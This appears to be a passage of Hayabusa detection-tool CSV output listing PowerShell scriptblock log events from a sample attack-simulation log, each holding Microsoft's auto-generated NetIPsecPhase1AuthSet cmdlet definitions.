$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 
'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
